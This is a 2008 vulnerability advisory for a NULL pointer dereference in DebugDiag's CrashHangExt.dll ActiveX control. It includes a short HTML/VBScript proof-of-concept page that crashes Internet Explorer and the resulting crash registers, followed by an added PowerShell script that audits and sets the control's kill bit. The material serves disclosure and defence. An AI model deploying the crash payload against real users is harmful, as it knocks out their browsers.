DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference

2008-10-30 / 2008-10-31
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Name     : DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference
Credit   : suN8Hclf (DaRk-CodeRs Group), crimson.loyd_at_gmail.com
Download : http://www.microsoft.com/downloads/details.aspx?FamilyID=28bd5941-c458-46f1-b24d-f60151d875a3&displaylang=en#Overview
Greetz   : Luigi Auriemma, Louis Carriere, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, Myo Katharsis, all from #dark-coders

=+ Product of Fuzzing +=

This code should crash Internet Explorer.

Tested on:
+ Windows XP SP2 (fully patched) & IE 6.0 (fully patched)
+ Windows 2000 SP 4 (fully patched) & IE 6.0 (fully patched)

Marked as:
================================================
Class Utils
GUID: {7233D6F8-AD31-440F-BAF0-9E7A292A53DA}
Number of Interfaces: 1
Default Interface: IUtils
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
================================================

Exploit:
~~~~~~~~~~~~~~~~~~~~~~
-----------------------code.htm--------------------------
<body>
<object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' />
</object>
<script language='vbscript'>
arg1=-2147483647
target.GetEntryPointForThread arg1
</script>
</body>
-----------------------code.htm--------------------------

Info
~~~~~~~~~~~~~~~~~~~~~~
EAX 00000000
ECX 0012DDDC
EDX 001E98EA
EBX 02C318E8 CrashHan.02C318E8
ESP 0012DD88
EBP 0012DE04
ESI 023F1FE0
EDI 00000000
EIP 02C38290 CrashHan.02C38290

IE crashes while trying to execute this line (Null pointer dereference):

02C38290  8B08  MOV ECX,DWORD PTR DS:[EAX]

//www.dark-coders.pl
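The advisory lists the control as "KillBitSet: False". The following is an added example, not part of the original advisory or of DebugDiag: a PowerShell audit that reports whether the Internet Explorer kill bit is set for that CLSID and, with -Apply, sets it. It assumes PowerShell 3.0 or later and an elevated prompt for -Apply; the function name Get-KillBitState is hypothetical.

```powershell
# Added example: audit / set the IE kill bit for the CLSID named in the advisory.
# Usage: .\killbit.ps1          (report only)
#        .\killbit.ps1 -Apply   (set the kill bit where it is missing; needs admin)
param([switch]$Apply)

$Clsid   = '{7233D6F8-AD31-440F-BAF0-9E7A292A53DA}'  # "Class Utils" GUID from the advisory
$KillBit = 0x400                                     # Compatibility Flags bit that blocks instantiation in IE

# 32-bit IE on 64-bit Windows reads the WOW6432Node view, so both views are checked.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-KillBitState {
    param([string]$Root, [string]$Clsid, [int]$Bit)
    $key   = Join-Path $Root $Clsid
    $flags = 0
    if (Test-Path -LiteralPath $key) {
        $item = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($item) { $flags = $item.'Compatibility Flags' }
    }
    [pscustomobject]@{
        Key        = $key
        Raw        = $flags
        Flags      = ('0x{0:X8}' -f $flags)
        KillBitSet = (($flags -band $Bit) -ne 0)
    }
}

foreach ($root in $Roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # view absent on this OS
    $state = Get-KillBitState -Root $root -Clsid $Clsid -Bit $KillBit
    if ($Apply -and -not $state.KillBitSet) {
        if (-not (Test-Path -LiteralPath $state.Key)) {
            New-Item -Path $state.Key -Force | Out-Null
        }
        # OR the bit in so any compatibility flags already present are preserved.
        New-ItemProperty -LiteralPath $state.Key -Name 'Compatibility Flags' `
            -PropertyType DWord -Value ($state.Raw -bor $KillBit) -Force | Out-Null
        $state = Get-KillBitState -Root $root -Clsid $Clsid -Bit $KillBit
    }
    $state | Select-Object Key, Flags, KillBitSet
}
```

A missing key or a Flags value without 0x400 means Internet Explorer will still instantiate the control from a web page; running IE instances must be restarted before a newly set kill bit takes effect.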

References:

http://www.dark-coders.pl

